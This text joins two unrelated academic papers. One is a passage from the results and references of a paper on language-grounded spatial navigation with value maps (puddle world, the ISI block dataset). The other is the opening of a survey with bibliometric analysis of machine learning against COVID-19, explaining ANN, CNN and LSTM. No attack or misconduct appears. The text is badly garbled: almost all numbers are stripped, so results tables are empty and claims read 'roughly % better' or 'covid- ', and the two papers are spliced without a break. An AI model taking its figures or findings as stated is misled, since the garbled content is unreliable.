we use adam optimization (kingma and ba, ) for training all models. results we present empirical results on two different datasets - our annotated puddle world and an exist- ing block navigation task (bisk et al., ). . puddle world navigation comparison with the state-of-the-art we first investigate the ability of our model to learn solely from environment simulation. figure shows the discounted reward achieved by our model as well as the two baselines for both instruction types. in both experiments, our model is the only one of the local global combined policy quality distance policy quality distance policy quality distance uvfa (text) . . . . . . cnn + lstm . . . . . . our model . . . . . . table : performance of models trained via reinforcement learning on a held-out set of environments and instructions. policy quality is the true expected normalized reward and distance denotes the manhattan distance from goal location prediction to true goal position. 
we show results from training on the local and global instructions both separately and jointly. local global mse policy quality distance mse policy quality distance uvfa (pos) . . . . . . uvfa (text) . . . . . . cnn + lstm . . . . . . our model (w/o gradient) . . . . . . our model . . . . . . table : performance on a test set of environments and instructions after supervised training. lower is better for mse and manhattan distance; higher is better for policy quality. the gradient basis significantly improves the reconstruction error and goal localization of our model on global instructions, and expectedly does not affect its performance on local instructions. three to achieve an average nonnegative reward after convergence ( . for local instructions and . for global instructions), signifying that the baselines do not fully learn how to navigate through these envi- ronments. following schaul et al. ( ), we also evaluated our model using the metric of policy quality. this is defined as the expected discounted reward achieved by following a softmax policy of the value predic- tions. policy quality is normalized such that an op- timal policy has a score of and a uniform random policy has a score of . intuitively, policy quality is the true normalized expectation of score over all maps in the dataset, instructions per map, and start states per map-instruction pair. our model outper- forms both baselines on this metric as well on the test maps (table ). we also note that the perfor- mance of the baselines flip with respect to each other as compared to their performance on the training maps (figure ). while the uvfa variant learned a better policy on the train set, it did not generalize to new environments as well as the cnn + lstm. finally, given the nature of our environments, we can use the predicted value maps to infer a goal lo- cation by taking the position of the maximum value. we use the manhattan distance from this predicted position to the actual goal location as a third met- ric. the accuracy of our model’s goal predictions is more than twice that of the baselines on local refer- ences and roughly % better on global references. analysis of learned representations for the rep- resentation analysis in a supervised setting, we com- pared the predicted value maps of all models against figure : value map predictions for two environments paired with two instructions each. despite the dif- ference in instructions, with one being global and the other local in nature and sharing no objects in their descriptions, they refer to the same goal location in the environment in (a). however, in (b), the descriptions correspond to different locations on the map. the vertical axis considers variance in goal location for the same instruction, depending on the map configuration. the unseen test split of maps. table shows the re- sults of this study. as expected, our model with- out the global gradient performs no differently from the full model on local references, but has higher mse and average distances to true goal than the full model on global references. we also note that uvfa (pos) performs much worse than both cnn+lstm and our model, showing the difficulty of environ- ment generalization even when the goals are ob- served directly. (the original uvfa paper (schaul et al., ) demonstrated effective generalization over goal states within a single environment.) 
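the two evaluation quantities used above can be made concrete with a short sketch: policy quality rescales an achieved expected discounted return so that a uniform random policy scores zero and an optimal policy scores one, and goal localization error takes the argmax of the predicted value map as the predicted goal and measures its manhattan distance to the true goal. the helpers below are our reading of those definitions, not code from the authors.

```python
import numpy as np

def policy_quality(score, random_score, optimal_score):
    # normalize so a uniform random policy scores 0 and an optimal policy scores 1
    return (score - random_score) / (optimal_score - random_score)

def goal_distance(value_map, true_goal):
    # predicted goal = position of the maximum predicted value
    pred = np.unravel_index(np.argmax(value_map), value_map.shape)
    return abs(pred[0] - true_goal[0]) + abs(pred[1] - true_goal[1])

# example with a made-up 10x10 value map and made-up scores
v = np.random.rand(10, 10)
print(goal_distance(v, true_goal=(3, 7)))
print(policy_quality(score=0.42, random_score=0.10, optimal_score=0.80))
```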
surprisingly, our model trained via reinforcement learning has more precise goal location predictions (as measured via manhattan distance) than when trained on true state values in a supervised manner. however, the mse of the value predictions are much higher in the rl setting (e.g., . vs . for super- vised on local instructions). this shows that despite the comparative stability of the supervised setting, minimization of value prediction error does not nec- essarily lend itself to the best policy or goal local- ization. conversely, having a higher mse does not always imply a worse policy, as seen also in the per- formance of the two uvfa variants in table . generalization one of the criteria laid out for our model was its ability to construct language repre- sentations and produce accurate value maps, inde- pendent of layouts and linguistic variation. figure provides examples of two layouts, each with two dif- ferent instructions. in the first map (top), we have both instructions referring to the same location. our model is able to mimic the optimal value map accu- rately, while the other baselines are not as precise, either producing a large field of possible goal loca- tions (cnn+lstm) or completely missing the goal (uvfa-text). on the vertical axis, we observe generalization across different maps with the same instructions. our model is able to precisely identify the goals in each scenario in spite of significant variation in their figure : examples of failure cases for our model. multiple levels of indirection in (a) and a long in- struction filled with redundant information in (b) make the instruction difficult to interpret. intended goal locations are outlined in red for clarity. locations. this proves harder for the other represen- tations. although our model is compositional in the sense that it transfers knowledge of spatial references be- tween different environments, some types of instruc- tions do prove challenging. we identify two of the poorest predictions in figure . we see that multiple levels of indirection (as in a, which references a lo- cation relative to an object relative to another object) or unnecessarily long instructions (as in b, which uniquely identifies a position by the eighth token but then proceeds with redundant information) are still a challenge. learning curve due to the manual effort that comes with constructing a dataset of human anno- tations, it is also important to consider the sample- efficiency of a model. figure shows the quality policy and prediction error on local instructions as a function of training set size. our model reaches . policy quality with only samples, demonstrating efficient generalization capability. figure : effect of training set size on held-out pre- dictions. the curves show the mean of ten training runs and the shaded regions show standard devia- tion. our model’s policy quality is greater than . with as few as training goal annotations. language grounding dataset policy quality distance uvfa (text) . . cnn + lstm . . our model . . table : the performance of our model and two baselines on the isi language grounding dataset (bisk et al., ). our model once again out- performs the baselines, although all models have a lower policy quality on this dataset than on our own. . isi grounding dataset we also evaluate our model on the isi language grounding dataset (bisk et al., ), which con- tains human-annotated instructions describing how to arrange blocks identified by numbers and logos. 
although it does not contain variable environment maps as in our dataset, it has a larger action space and vocabulary. the caveat is that the task as posed in the original dataset is not compatible with our model. for a policy to be derived from a value map with the same dimension as the state observation, it is implicitly assumed that there is a single con- trollable agent, whereas the isi set allows multiple blocks to be moved. we therefore modify the isi setup using an oracle to determine which block is given agency during each step. this allows us to figure : (a-c) visualizations of tasks from the isi language grounding dataset (bisk et al., ) and our model’s value map predictions. the agentive block and goal location are outlined in red for visibility. (d) the mse of the value map prediction as a function of a subgoal’s ordering in an overall task. the model performs better on subgoals later in a task despite the subgoals being treated completely independently during both training and testing. retain the linguistic variability of the dataset while overcoming the mismatch in task setup. the states are discretized to a × map and the instructions are lemmatized. performance on the modified isi dataset is re- ported in table and representative visualizations are shown in figure . our model outperforms both baselines by a greater margin in policy quality than on our own dataset. misra et al. ( ) also use this dataset and report results in part by determining the minimum distance between an agent and a goal during an evaluation lasting n steps. this evaluation metric is therefore dependent on this timeout parameter n. because we discretized the state space so as to be able to repre- sent it as a grid of embeddings, the notion of a single step has been changed and direct comparison limited to n steps is ill-defined. hence, due to modifica- when a model is available and the states are not over- whelmingly high-dimensional, policy quality is a useful metric that is independent of this type of parameter. as such, it is our tions in the task setup, we cannot compare directly to the results in misra et al. ( ). understanding grounding evaluation an inter- esting finding in our analysis was that the difficulty of the language interpretation task is a function of the stage in task execution (figure (d)). in the isi language grounding set (bisk et al., ), each individual instruction (describing where to move a particular block) is a subgoal in a larger task (such as constructing a circle with all of the blocks). the value maps predicted for subgoals occurring later in a task are more accurate than those occurring early in the task. it is likely that the language plays a less crucial role in specifying the subgoal position in the final steps of a task. as shown in figure (a), it may be possible to narrow down candidate subgoal po- sitions just by looking at a nearly-constructed high- default metric here. however, estimating policy quality for en- vironments substantially larger than those investigated here is a challenge in itself. level shape. in contrast, this would not be possible early in a task because most of the blocks will be randomly positioned. this finding is consistent with a result from branavan et al. ( ), who reported that strategy game manuals were useful early in the game but became less essential further into play. it appears to be part of a larger trend that the marginal benefit of language in such grounding tasks can vary predictably between individual instructions. 
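the per-stage analysis described above can be reproduced by grouping value-map errors by the subgoal's position within its task, as in the small helper below; the record format is a placeholder of ours for whatever bookkeeping the evaluation code actually keeps.

```python
from collections import defaultdict

def mse_by_subgoal_index(records):
    """records: iterable of (subgoal_index, mse) pairs collected during evaluation.
    returns the mean value-map mse for each position of a subgoal within its task."""
    sums, counts = defaultdict(float), defaultdict(int)
    for idx, mse in records:
        sums[idx] += mse
        counts[idx] += 1
    return {idx: sums[idx] / counts[idx] for idx in sums}

# example with made-up numbers: later subgoals tend to have lower error
print(mse_by_subgoal_index([(0, 1.2), (0, 1.0), (1, 0.8), (2, 0.5), (2, 0.4)]))
```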
conclusions we have described a novel approach for grounded spatial reasoning. combining the language repre- sentation in a spatially localized manner allows for increased precision of goal identification a nd im- proved performance on unseen environment config- urations. alongside our models, we present pud- dle world navigation, a new grounding dataset for testing the generalization capacity of instruction- following algorithms in varied environments. acknowledgement we thank the members of the mit nlp group, the tacl reviewers and action editor for helpful feedback. we gratefully acknowledge support from the mit lincoln laboratory and the mit super- urop program. references jacob andreas and dan klein. . alignment-based compositional semantics for instruction following. in emnlp. yoav artzi and luke zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping in- structions to actions. tacl, ( ): – . richard bellman. . dynamic programming. princeton university press, princeton, nj, usa, edi- tion. yonatan bisk, deniz yuret, and daniel marcu. . natural language communication with robots. in naacl hlt, pages – . s.r.k. branavan, david silver, and regina barzilay. . learning to win by reading manuals in a monte- carlo framework. in acl hlt, pages – . michael buhrmester, tracy kwang, and samuel d. gosling. . amazon’s mechanical turk. per- spectives on psychological science, ( ): – . pmid: . ruth m.j. byrne and philip n. johnson-laird. . spatial reasoning. journal of memory and language, ( ): – . david l. chen and raymond j. mooney. . learn- ing to interpret natural language navigation instruc- tions fro mobservations. in proceedings of the th aaai conference on artificial intelligence (aaai- ), pages – , san francisco, ca, usa, au- gust. kan chen, jiang wang, liang-chieh chen, haoyuan gao, wei xu, and ram nevatia. . abc- cnn: an attention based convolutional neural net- work for visual question answering. arxiv preprint arxiv: . . william t. freeman and edward h. adelson. . the design and use of steerable filters. ieee tpami, ( ): – . sachithra hemachandra, matthew r. walter, stefanie tellex, and seth teller. . learning spatial- semantic representations from natural language de- scriptions and scene classifications. in icra, pages – . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . john d. kelleher, geert-jan m. kruijff, and fintan j. costello. . proximity in context: an empirically grounded computational model of proximity for pro- cessing topological spatial expressions. in acl, pages – . joohyun kim and raymond j. mooney. . adapting discriminative reranking to grounded language learn- ing. in acl ( ), pages – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in iclr. thomas kollar, stefanie tellex, deb roy, and nicholas roy. . toward understanding natural language directions. in human-robot interaction, pages – . ieee. stephen c levinson. . space in language and cog- nition: explorations in cognitive diversity, volume . cambridge university press. michael levit and deb roy. . interpretation of spa- tial language in a map navigation task. ieee transac- tions on systems, man, and cybernetics, part b (cy- bernetics), ( ): – . peggy li and lila gleitman. . turning the ta- bles: language and spatial reasoning. cognition, ( ): – . matt macmahon, brian stankiewicz, and benjamin kuipers. . walk the talk: connecting language, knowledge, and action in route instructions. aaai, ( ): . daniel j. 
mankowitz, timothy arthur mann, and shie mannor. . iterative hierarchical optimiza- tion for misspecified problems (ihomp). corr, abs/ . . dipendra k. misra, john langford, and yoav artzi. . mapping instructions and visual observations to actions with reinforcement learning. emnlp. volodymyr mnih, koray kavukcuoglu, david silver, andrei a. rusu, joel veness, marc g. bellemare, alex graves, martin riedmiller, andreas k. fidje- land, georg ostrovski, stig petersen, charles beat- tie, amir sadik, ioannis antonoglou, helen king, dharshan kumaran, daan wierstra, shane legg, and demis hassabis. . human-level control through deep reinforcement learning. nature, ( ): – , . reinhard moratz and thora tenbrink. . spatial ref- erence in linguistic human-robot interaction: iterative, empirically supported development of a model of pro- jective relations. spatial cognition and computation, ( ): – . tom schaul, daniel horgan, karol gregor, and david silver. . universal value function approximators. in icml, pages – . m. skubic, d. perzanowski, s. blisard, a. schultz, w. adams, m. bugajska, and d. brock. . spatial language for human-robot dialogs. ieee transactions on systems, man, and cybernetics, part c (applica- tions and reviews), ( ): – , may. richard s. sutton and andrew g. barto. . introduc- tion to reinforcement learning. mit press. richard s. sutton. . generalization in rein- forcement learning: successful examples using sparse coarse coding. in nips. stefanie tellex, thomas kollar, steven dickerson, matthew r. walter, ashis gopal banerjee, seth j. teller, and nicholas roy. . understanding natu- ral language commands for robotic navigation and mo- bile manipulation. in aaai. thora tenbrink. . space, time, and the use of lan- guage: an investigation of relationships, volume . walter de gruyter. jette viethen and robert dale. . the use of spatial relations in referring expression generation. in pro- ceedings of the fifth international natural language generation conference, pages – . acl. adam vogel and dan jurafsky. . learning to follow navigational directions. in acl, pages – . matthew r. walter, sachithra hemachandra, bianca homberg, stefanie tellex, and seth teller. . learning semantic maps from natural language de- scriptions. proceedings of the robotics: science and systems ix conference. early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks haruna chiroma , absalom e. ezugwu , fatsuma jauro , mohammed a. al-garadi , idris n. abdullahi and liyana shuib future technology research center, national yunlin university of science and technology, yulin, taiwan school of mathematics, statistics, and computer science, university of kwazulu-natal, kwazulu-natal, south africa department of computer science, faculty of science, ahmadu bello university, zaria, nigeria department of biomedical informatics, emory university, atlanta, ga, usa department of medical laboratory science, college of medical sciences, ahmadu bello university, zaria, nigeria department of information system, universiti malaya, kuala lumpur, malaysia abstract background and objective: the covid- pandemic has caused severe mortality across the globe, with the usa as the current epicenter of the covid- epidemic even though the initial outbreak was in wuhan, china. many studies successfully applied machine learning to fight covid- pandemic from a different perspective. 
to the best of the authors’ knowledge, no comprehensive survey with bibliometric analysis has been conducted yet on the adoption of machine learning to fight covid- . therefore, the main goal of this study is to bridge this gap by carrying out an in-depth survey with bibliometric analysis on the adoption of machine learning-based technologies to fight covid- pandemic from a different perspective, including an extensive systematic literature review and bibliometric analysis. methods: we applied a literature survey methodology to retrieved data from academic databases and subsequently employed a bibliometric technique to analyze the accessed records. besides, the concise summary, sources of covid- datasets, taxonomy, synthesis and analysis are presented in this study. it was found that the convolutional neural network (cnn) is mainly utilized in developing covid- diagnosis and prognosis tools, mostly from chest x-ray and chest ct scan images. similarly, in this study, we performed a bibliometric analysis of machine learning-based covid- related publications in the scopus and web of science citation indexes. finally, we propose a new perspective for solving the challenges identified as direction for future research. we believe the survey with bibliometric analysis can help researchers easily detect areas that require further development and identify potential collaborators. results: the findings of the analysis presented in this article reveal that machine learning-based covid- diagnose tools received the most considerable attention from researchers. specifically, the analyses of results show that energy and resources are more dispenses towards covid- automated diagnose tools while covid- drugs and vaccine development remains grossly underexploited. besides, the machine learning-based algorithm that is predominantly utilized by researchers in developing the diagnostic tool is cnn mainly from x-rays and ct scan images. how to cite this article chiroma h, ezugwu ae, jauro f, al-garadi ma, abdullahi in, shuib l. . early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks. peerj comput. sci. :e doi . /peerj-cs. submitted july accepted october published november corresponding author absalom e. ezugwu, ezugwua@ukzn.ac.za academic editor ahmed elazab additional information and declarations can be found on page doi . /peerj-cs. copyright chiroma et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ezugwua@�ukzn.�ac.�za https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ conclusions: the challenges hindering practical work on the application of machine learning-based technologies to fight covid- and new perspective to solve the identified problems are presented in this article. furthermore, we believed that the presented survey with bibliometric analysis could make it easier for researchers to identify areas that need further development and possibly identify potential collaborators at author, country and institutional level, with the overall aim of furthering research in the focused area of machine learning application to disease control. 
subjects bioinformatics, artificial intelligence, data mining and machine learning keywords bibliometric analysis, convolutional neural network, covid- pandemic, covid- diagnosis tool, machine learning introduction the novel coronavirus disease pandemic emerged on december , , and the chinese government announced the isolation of new types of coronavirus on january , (imai et al., ). this virus was code-named as covid- by the world health organization (who) on january , . however, it was renamed to severe acute respiratory syndrome coronavirus- (sars-cov- ) by the international committee on the taxonomy of the virus (gorbalenya, ). since the pandemic, the number of confirmed cases as of october , reached , , with , , recorded fatalities. according to the origin of the first confirmed case report, the infection’s transmission was from animal to human, that is, zoonotic agent (read et al., ). the virus has extended beyond china to other continents of the world (wang et al., a). the rise in the number of cases in wuhan and other countries after the evacuation of the cases and closure of the marketplace in wuhan shows a secondary transmission between humans. related to the severe acute respiratory syndrome (sars), the covid- pandemic occurred during the china spring festival, the most famous celebration in china that attracted about million chinese people who traveled throughout the country. this festival period might have created an avenue for the transmission of this contiguous disease, making its prevention and control very difficult. the report on the secondary cases was made approximately days after the first outbreak of the virus. these new patients were infected through human-to-human transmission because they never had any contact with the wuhan marketplace, the origin of the first case of the pandemic (read et al., ). the first non-chinese infected case that spread over the provinces of china and then to the continents of asia was reported on january , , without any connection to the epidemiology at the market place in wuhan (hui et al., ). subsequently, the spread continued, and various cases from countries abroad, such as the usa, italy, and france began to be reported (holshue et al., ). human-to-human transmission usually occurs in the case of close contact between humans. restricting human-to-human spread is crucial for decreasing secondary infections among healthcare workers and close contact. the who recommended chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ infection control interventions to reduce the risk of the general spread of acute respiratory diseases such as avoiding close contact with infected patients, frequent washing of hands in case of contact with ill people, and avoiding unprotected contacts with wild or farm animals. people suffering from the acute respiratory infection should always observe cough etiquette by maintaining distancing, covering their cough, sneezing with disposable tissues, and washing their hands frequently. within the healthcare system, equipment improved standard infection control and prevention practices are recommended, especially in the hospital emergency unit (world health organization, ). progressively, an interim clinical guideline has been established by the us center for disease control and prevention for the covid- pandemic to place control measures and reduce the spread of sars-cov- in the usa (patel & jernigan, ). 
in minimizing the devastating effect of the covid- pandemic and fighting the virus, the timely processing of covid- data analytics is highly critical. the data can come from different aspects such as the patients, fractionated into molecular, society, and population, which can help in the prevention and treatment of covid- (park et al., ). machine learning is one of the major technologies in combatting covid- (elavarasan & pugazhendhi, ; kumar, gupta & srivastava, ). much effort based on synergy from the machine learning and biomedical research community is ongoing to develop different approaches to combat the disease. ongoing efforts include the screening of patients, detection and monitoring of patients, development of drugs, repurposing of drugs to treat patients with covid- , predicting the protein structure related to covid- , covid- diagnostic systems, covid- vaccine development, and analyzing personalized therapeutic effects for the evaluation of new patients (alimadadi et al., ). the overall goal of these disease control techniques is to prevent the spread; track confirmed cases, recoveries, and mortality; and predict future pandemics (vaishya et al., ). many studies adopted machine learning to fight the covid- pandemic from a different perspective. a systematic literature review of published and preprinted reports on prediction models for diagnosing covid- was reported. prediction models were found floating the academic literature very rapidly to help in diagnosing covid- and making critical medical decisions (wynants et al., ). however, the major issue with the work is that it uses preprint publication that has not been validated by peer review. the review is not specific to machine learning for covid- . sources of covid- datasets that can guide researchers access different data for studies on covid- are absent. the study is limited to the diagnosis and prognosis of covid- . a comprehensive taxonomy on the prediction tools to show the area that needs improvement is missing in the survey. bibliometric analysis is not integrated into the study. similar bibliometric analyses have been reported in the literature as presented by chahrour et al. ( ), hossain ( ), and lou et al. ( ). however, these existing analyses differ from the current bibliometric analysis in this study because the current analysis result focuses on the application of machine learning techniques to combat covid- pandemic as opposed to various literature reporting general medical practices on covid- . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in this study, we propose to conduct a dedicated comprehensive survey on the adoption of machine learning to fight the covid- pandemic from a different perspective, including an extensive literature review and a bibliometric analysis. to the best of our knowledge, this study is the first comprehensive analysis of research output focusing on several possible applications of machine learning techniques for mitigating the worldwide spread of the ongoing covid- pandemic. we are mindful that other publications might not be captured in our scope because the current study is only limited to the eight academic databases mentioned in table . we are also very dependent on the indexing of the databases used, which is akin to any other bibliometric research study. other sections of the study are organized as follows: “methodology” presents the methodology for the survey. 
“theoretical background of machine learning algorithms” presents the rudiments of the major machine learning algorithms used in fighting the covid- pandemic. “covid- machine learning adoption-oriented perspective” presents the adoption of machine learning to fight covid- . “covid- datasets” unravels the different sources of covid- datasets. “survey and bibliometric analysis” discusses the survey and bibliometric analysis. “challenges and future research opportunities” unveils challenges and future research directions before the conclusion in “conclusions”. figure presents the visual structure of the survey article, which is similar to the work in (mohammadi et al., ). methodology this section presents the protocol followed to survey the adoption of machine learning in fighting covid- . the survey was performed based on a systematic literature review procedure in computer science given by weidt & silva ( ). the search keywords, techniques, data sources, databases, and inclusion/exclusion criteria used are discussed. search keywords initial search keywords were carefully selected based on the defined research goal. after an initial search, multiple keywords were formulated from new words found in several relevant articles. the keywords were later reduced to suit the objective of the research. the keywords used for the study included “deep learning, covid- ,” “convolutional neural network, covid- ,” “long short term memory, covid- ,” “artificial neural network, covid- ,” “machine learning, covid- ,” “decision tree, covid- ,” “covid- diagnosis tool,” and “covid- decision support system.” data sources the defined search keywords were used to retrieve relevant journal articles and conference papers published by prominent peer-reviewed journals indexed in various academic databases. table shows the different academic databases used to obtain articles for the survey. chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ article inclusion/exclusion criteria inclusion/exclusion criteria were set up based on the research aim to decide which articles are eligible for the next review stage. articles that meet the inclusion criteria were considered relevant for the research, and those that do not meet the inclusion criteria were excluded. the set inclusion/exclusion criteria are provided in table . article selection article selection for this research followed a three-stage analysis. the first analysis stage considered only the titles and abstracts of the articles to extract relevant articles. table academic databases. academic database link dblp http://dblp.uni-trier.de/ acm digital library http://dl.acm.org/ ieeexplore https://ieeexplore.ieee.org/ sciencedirect http://www.sciencedirect.com/ springerlink https://link.springer.com/ pubmed https://pubmed.ncbi.nlm.nih.gov/ scopus https://www.scopus.com/ web of science https://apps.webofknowledge.com/ figure graphical representation of the survey structure. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dblp.uni-trier.de/ http://dl.acm.org/ https://ieeexplore.ieee.org/ http://www.sciencedirect.com/ https://link.springer.com/ https://pubmed.ncbi.nlm.nih.gov/ https://www.scopus.com/ https://apps.webofknowledge.com/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ the second analysis stage considered the analysis of the abstract, introduction, and conclusion to refine the selection in the first stage. at the third and final analysis stages, articles were read thoroughly, and a threshold was set to rate the quality of articles in terms of their relevance to the research. a article was selected if it reported an empirical application of machine learning to fight covid- similar to rodriguez-morales et al. ( ). articles that met the threshold value were selected, and those below the threshold were dropped. figure shows the total number of articles obtained from the academic databases and the final number of articles considered for the research after applying all the extraction criteria. bibliometric protocol vosviewer software was used to present a bibliometric analysis of the existing literature on covid- . vosviewer software is a tool for constructing and visualizing bibliometric maps of items, such as journals, research, or individual publications. these maps can be created based on citation, bibliographic coupling, co-citation, or co-authorship relations. the bibliometric analysis software also offers text mining functionality that can table article inclusion/exclusion criteria. inclusion criteria exclusion criteria the review only focuses on covid- other viral infections and health issues were not considered relevant in the survey only articles that applied machine learning techniques to fight covid- were considered articles using techniques other than machine learning techniques were excluded articles/conference papers published by prominent and indexed journals were included articles/conference papers published by non-indexed journals were excluded. the article uploaded as a preprint in preprint servers such as biorxiv, medrxiv, arxiv, etc. without peer review were excluded only articles written in the english language were considered for inclusion articles written in languages other than english were excluded figure article selection process. full-size doi: . /peerj-cs. /fig- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be used to construct and visualize co-occurrence networks of important terms extracted from a body of scientific literature (see www.vosviewer.com). we only used , publications with the keyword “novel coronavirus” and publications with the keyword “covid- and artificial intelligence” that were retrieved from scopus and web of science academic databases for the bibliometric analysis presented in this study. only document results were extracted using the keyword “covid- and machine learning” from the same academic database. articles from other sources were not considered because most of these publications have not been peer-reviewed and are not available online in the form of preprint publications. theoretical background of machine learning algorithms numerous machine learning algorithms exist in the literature. in this section, we discuss the basic operations of the major machine learning algorithms used in fighting the covid- pandemic to provide the readers with a basic concept of how the algorithms operate in achieving their goal, especially novice researchers, thus making the study self-contained. the main algorithms include artificial neural network (ann), convolutional neural network (cnn), and long short term memory (lstm). 
artificial neural network
artificial neural network is a machine learning algorithm designed to emulate the human brain. similar to neurons in the human brain, an ann consists of interconnected nodes. a given ann consists of three essential components, namely, node (neuron) character, network topology, and several learning rules (livingstone, ). the signal processing strategy, involving the number of inputs and outputs associated with a node, the weight of each input and output, and the activation function, is determined by the node character. the organization of the nodes and the interconnections between them are determined by the network architecture, which usually consists of three underlying layers (input, output, and hidden layers). learning is employed to train the network, and the learning rules decide on weight initialization and adjustment. an ann is said to have learnt if it can process probabilistic, fuzzy, noisy, and vague data with an insignificant negative effect on the output quality and can generalize acquired knowledge to unknown tasks (basheer & hajmeer, ). a basic ann model consists of multiple nodes, such that every node receives multiple inputs from other nodes through connections having associated weights. the weighted sum of the inputs is passed through a threshold gate: the node is activated and transmits its output to other nodes only if the weighted sum of its inputs exceeds the threshold (basheer & hajmeer, ).

convolutional neural network
convolutional neural network is the most commonly used deep learning algorithm (haque & neubert, ). it is a discriminative deep learning algorithm formed by a stack of multiple convolutional and pooling layers (deng, ). the major strength of cnn lies in its ability to perform parameter sharing, sparse interaction, and equivariant representation. the network is faster and easier to train due to its utilization of local connections and sharing of weights (pouyanfar et al., ). a typical cnn receives an image as its input and has neurons arranged in a 3d form, connecting to only a portion of the previous layer (haque & neubert, ). the architecture of a cnn is presented in a series of stages, where the first stages consist of convolution and pooling layers, and the final stage is composed of a fully connected layer (lecun, bengio & hinton, ). a cnn receives a 3d input x of the form m × m × r, where m is the height and width of the input and r is the number of channels (for example, r = 3 for an rgb image). the convolution layer has several filters, known as kernels, k, each of size n × n × q, where n < m and q ≤ r. the kernels share the same weight (w_k) and bias (b_k) parameters. during convolution, k feature maps h_k are generated, each of size m − n + 1. the convolution layer computes the dot product between w_k and the input x and applies an activation function f to the output, expressed as (pouyanfar et al., ): h_k = f(w_k · x + b_k). the pooling layer prevents overfitting and hastens training by reducing the size of the feature map (pouyanfar et al., ; zhao et al., ); maximum and average pooling are the most widely applied pooling methods. finally, fully connected softmax layers are deployed for prediction (zhao et al., ).
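a minimal python/numpy sketch may help make the notation above concrete: it shows the weighted-sum-and-threshold computation of a single ann node and one convolution-plus-pooling step of a cnn, h_k = f(w_k · x + b_k). the array shapes, filter size, and values are toy assumptions chosen only for illustration; this is not code taken from any of the surveyed studies.

```python
# toy illustration of an ann node and a single cnn convolution + pooling step
import numpy as np

def relu(z):
    # activation function f, applied element-wise
    return np.maximum(0.0, z)

# --- ann node: weighted sum of inputs passed through an activation/threshold ---
x = np.array([0.2, 0.7, 0.1])            # inputs received from other nodes
w = np.array([0.4, -0.3, 0.8])           # weights of the incoming connections
b = 0.05                                 # bias
node_output = relu(w @ x + b)            # the node "fires" only if the weighted sum is positive

# --- cnn layer: h_k = f(w_k * x + b_k), followed by 2x2 max pooling ---
image = np.random.rand(8, 8)             # toy single-channel input (m x m, r = 1)
kernel = np.random.randn(3, 3)           # one n x n filter (kernel)
bias_k = 0.1

feature_map = np.zeros((6, 6))           # output of a valid convolution: m - n + 1
for i in range(6):
    for j in range(6):
        patch = image[i:i + 3, j:j + 3]
        feature_map[i, j] = relu(np.sum(kernel * patch) + bias_k)

# max pooling reduces the feature map size and helps prevent overfitting
pooled = feature_map.reshape(3, 2, 3, 2).max(axis=(1, 3))
print(node_output, pooled.shape)         # pooled map is 3 x 3
```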
long short term memory
the lstm deep learning network is a type of recurrent neural network that can recall data features over several intervals of time (liu et al., ). it was developed to solve the vanishing gradient weakness of the recurrent neural network (karim et al., ). the hidden layers of lstm are treated as memory cells, making the network powerful in handling long- and short-term correlations in a time series (zhao et al., ). the earliest version of lstm contained memory cells and input and output gates, with no forget gate; the forget gate was later introduced to enable continual learning of tasks by resetting the state of the lstm (greff et al., ). its updated architecture consists of multiple lstm units, with each unit having an input gate, a forget gate, an output gate, and a memory cell. sak, senior & beaufays ( ) described the underlying architecture of lstm as consisting of memory blocks in its hidden layer. the memory blocks contain memory cells that store the temporal state of the network, with additional units, known as gates, to supervise the information flow. a memory cell has an input gate that manages the inflow of input activations to the memory cell and an output gate that manages the outflow of cell activations to the rest of the network. the forget gate is incorporated to forget or reset the memory of the cell adaptively. lstm iteratively computes a mapping from an input sequence x = (x1, x2, …, xT) to an output sequence y = (y1, y2, …, yT) over timestamps t = 1 to T. lstm is good at addressing complex sequential machine learning problems (karim et al., ). deep lstm architectures consist of stacked lstm layers (sak, senior & beaufays, ). lstms are strong in handling temporal dependencies in sequences but weak in dealing with very long sequence dependencies (karim et al., ).

covid-19 machine learning adoption-oriented perspective
in the fight against covid-19, different aspects of artificial intelligence (ai) were applied to curtail its adverse effects (dananjayan & raj, ). the taxonomy in fig. was created from the projects that involved machine learning in fighting covid-19. the data used in creating the taxonomy were extracted from the articles that applied machine learning algorithms to fight covid-19.

figure: taxonomy of the machine learning algorithms adopted in fighting covid-19.

covid-19 diagnostic tools
currently, reverse transcription-polymerase chain reaction (rt–pcr)-based viral nucleic acid assays are used as the reference standard method to confirm covid-19 infection (corman et al., ). however, such a laboratory test is time consuming, and the supply of test kits may be a bottleneck for a rapidly growing suspect population, even in many developed countries such as the usa. more importantly, initial false-negative or weakly positive rt–pcr test results were found in several later-confirmed cases, while highly suspicious computed tomography (ct) imaging features were present (xu et al., ; xie et al., ). the treatment and screening of covid-19 can be more effective when the deep learning approach, ct features, and real-time rt–pcr results are integrated (li et al., a). ai and deep learning can assist in developing diagnostic tools and deciding on treatment (rao & vazquez, ; shi et al., ). as a result, many diagnostic tools were developed based on machine learning algorithms to fight covid-19.
